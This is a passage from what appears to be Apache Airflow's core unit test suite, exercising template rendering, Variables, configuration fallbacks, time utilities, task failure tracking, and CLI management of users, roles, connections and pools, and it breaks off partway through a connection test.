self.assertEqual(context['ti'].task.some_templated_field,
'{\n "foo": "bar"\n}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_delete(self):
key = "tested_var_delete"
value = "to be deleted"
# No-op if the variable doesn't exist
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
# Set the variable
Variable.set(key, value)
self.assertEqual(value, Variable.get(key))
# Delete the variable
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = conf.get('core', 'FERNET_KEY')
with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
FALLBACK_FERNET_KEY = conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
with conf_vars({('core', 'fernet_key'): None}):
with self.assertRaises(AirflowConfigException) as cm:
conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
with unittest.mock.patch.dict('os.environ', {key: value}):
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
with unittest.mock.patch.dict('os.environ', {key: value}):
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_run_command(self):
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)), '\u1000foo')
self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_id=DagRun.id_for_date(EXECUTION_DATE),
execution_date=EXECUTION_DATE,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)
ti = TI(task=task, execution_date=EXECUTION_DATE)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], EXECUTION_DS)
self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)
self.assertEqual(context['prev_ds'], EXECUTION_DS)
self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class TestCli(unittest.TestCase):
TEST_USER1_EMAIL = 'test-user1@example.com'
TEST_USER2_EMAIL = 'test-user2@example.com'
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._cleanup()
def setUp(self):
super().setUp()
from airflow.www import app as application
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
for email in [self.TEST_USER1_EMAIL, self.TEST_USER2_EMAIL]:
test_user = self.appbuilder.sm.find_user(email=email)
if test_user:
self.appbuilder.sm.del_register_user(test_user)
for role_name in ['FakeTeamA', 'FakeTeamB']:
if self.appbuilder.sm.find_role(role_name):
self.appbuilder.sm.delete_role(role_name)
super().tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(Pool).delete()
session.query(Variable).delete()
session.commit()
session.close()
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test'
])
cli.users_create(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
args = self.parser.parse_args([
'users', 'delete', '--username', 'test3',
])
cli.users_delete(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'users', 'create', '--username', 'user{}'.format(i), '--lastname',
'doe', '--firstname', 'jon',
'--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
'--use_random_password'
])
cli.users_create(args)
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.users_list(self.parser.parse_args(['users', 'list']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_list_users_with_args(self):
cli.users_list(self.parser.parse_args(['users', 'list',
'--output', 'tsv']))
def test_cli_import_users(self):
def assertUserInRoles(email, roles):
for role in roles:
self.assertTrue(self._does_user_belong_to_role(email, role))
def assertUserNotInRoles(email, roles):
for role in roles:
self.assertFalse(self._does_user_belong_to_role(email, role))
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Admin", "Op"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Public"]
}
]
self._import_users_from_file(users)
assertUserInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]
}
]
self._import_users_from_file(users)
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER1_EMAIL, ['Public'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Admin'])
def test_cli_export_users(self):
user1 = {"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]}
user2 = {"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]}
self._import_users_from_file([user1, user2])
users_filename = self._export_users_to_file()
with open(users_filename, mode='r') as file:
retrieved_users = json.loads(file.read())
os.remove(users_filename)
# ensure that an export can be imported
self._import_users_from_file(retrieved_users)
def find_by_username(username):
matches = [u for u in retrieved_users
if u['username'] == username]
if not matches:
self.fail("Couldn't find user with username {}".format(username))
else:
matches[0].pop('id') # this key not required for import
return matches[0]
self.assertEqual(find_by_username('imported_user1'), user1)
self.assertEqual(find_by_username('imported_user2'), user2)
def _import_users_from_file(self, user_list):
json_file_content = json.dumps(user_list)
f = NamedTemporaryFile(delete=False)
try:
f.write(json_file_content.encode())
f.flush()
args = self.parser.parse_args([
'users', 'import', f.name
])
cli.users_import(args)
finally:
os.remove(f.name)
def _export_users_to_file(self):
f = NamedTemporaryFile(delete=False)
args = self.parser.parse_args([
'users', 'export', f.name
])
cli.users_export(args)
return f.name
def _does_user_belong_to_role(self, email, rolename):
user = self.appbuilder.sm.find_user(email=email)
role = self.appbuilder.sm.find_role(rolename)
if user and role:
return role in user.roles
return False
def test_cli_add_user_role(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should not yet be a member of role 'Op'"
)
args = self.parser.parse_args([
'users', 'add_role', '--username', 'test4', '--role', 'Op'
])
cli.users_manage_role(args, remove=False)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should have been added to role 'Op'"
)
def test_cli_remove_user_role(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been created with role 'Viewer'"
)
args = self.parser.parse_args([
'users', 'remove_role', '--username', 'test4', '--role', 'Viewer'
])
cli.users_manage_role(args, remove=True)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been removed from role 'Viewer'"
)
@mock.patch("airflow.bin.cli.DagBag")
def test_cli_sync_perm(self, dagbag_mock):
self.expect_dagbag_contains([
DAG('has_access_control',
access_control={
'Public': {'can_dag_read'}
}),
DAG('no_access_control')
], dagbag_mock)
self.appbuilder.sm = mock.Mock()
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
assert self.appbuilder.sm.sync_roles.call_count == 1
self.assertEqual(2,
len(self.appbuilder.sm.sync_perm_for_dag.mock_calls))
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'has_access_control',
{'Public': {'can_dag_read'}}
)
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'no_access_control',
None,
)
def expect_dagbag_contains(self, dags, dagbag_mock):
dagbag = mock.Mock()
dagbag.dags = {dag.dag_id: dag for dag in dags}
dagbag_mock.return_value = dagbag
def test_cli_create_roles(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', 'create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles_create(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_create_roles_is_reentrant(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', 'create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles_create(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_list_roles(self):
self.appbuilder.sm.add_role('FakeTeamA')
self.appbuilder.sm.add_role('FakeTeamB')
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.roles_list(self.parser.parse_args(['roles', 'list']))
stdout = mock_stdout.getvalue()
self.assertIn('FakeTeamA', stdout)
self.assertIn('FakeTeamB', stdout)
def test_cli_list_roles_with_args(self):
cli.roles_list(self.parser.parse_args(['roles', 'list',
'--output', 'tsv']))
@mock.patch("airflow.bin.cli.db.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['db', 'init']))
initdb_mock.assert_called_once_with()
@mock.patch("airflow.bin.cli.db.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['db', 'reset', '--yes']))
resetdb_mock.assert_called_once_with()
def test_cli_connections_list(self):
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_list(self.parser.parse_args(['connections', 'list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['hive_cli_default', 'hive_cli'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
def test_cli_connections_list_with_args(self):
args = self.parser.parse_args(['connections', 'list',
'--output', 'tsv'])
cli.connections_list(args)
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', 'list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new1',
'--conn_uri=%s' % uri]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new2',
'--conn_uri=%s' % uri]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_uri
with self.assertRaises(SystemExit) as exc:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new']))
self.assertEqual(
exc.exception.code,
"The following args are required to add a connection: ['conn_uri or conn_type']"
)
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new1']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new2']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new3']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new4']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new5']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connection
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
session.close()
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_pool_list(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.pool_list(self.parser.parse_args(['pools', 'list']))
stdout = mock_stdout.getvalue()
self.assertIn('foo', stdout)
def test_pool_list_with_args(self):
cli.pool_list(self.parser.parse_args(['pools', 'list',
'--output', 'tsv']))
def test_pool_create(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
self.assertEqual(self.session.query(Pool).count(), 1)
def test_pool_get(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
try:
cli.pool_get(self.parser.parse_args(['pools', 'get', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
cli.pool_delete(self.parser.parse_args(['pools', 'delete', 'foo']))
self.assertEqual(self.session.query(Pool).count(), 0)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as file:
json.dump(pool_config_input, file)
# Import json
try:
cli.pool_import(self.parser.parse_args(['pools', 'import', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool import pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool_export(self.parser.parse_args(['pools', 'export', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool export pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as file:
pool_config_output = json.load(file)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_cli_version(self):
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.version(self.parser.parse_args(['version']))
stdout = mock_stdout.getvalue()
self.assertIn(version, stdout)
class TestConnection(unittest.TestCase):
def setUp(self):
utils.db.initdb()
@unittest.mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:password@ec2.compute.com:5432/the_database',
})
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
@unittest.mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
with unittest.mock.patch.dict('os.environ', {
'AIRFLOW_CONN_AIRFLOW_DB': 'postgres://username:password@ec2.compute.com:5432/the_database',
}):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
@unittest.mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:password@ec2.compute.com:5432/the_database',
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
